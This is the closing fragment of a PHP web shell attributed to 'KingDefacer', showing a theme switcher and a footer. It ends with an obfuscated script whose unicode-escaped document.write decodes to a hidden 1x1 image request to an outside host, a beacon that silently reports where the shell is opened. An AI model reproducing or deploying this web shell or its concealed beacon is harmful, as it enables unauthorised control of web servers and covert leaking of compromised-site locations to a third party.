<tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr>
</table>
</br></br><div id='bar'><center>Shell [version 2.0] Edited By <font color='red'><b>[KingDefacer]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font></center></div></body></html>";
ob_end_flush();
?>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>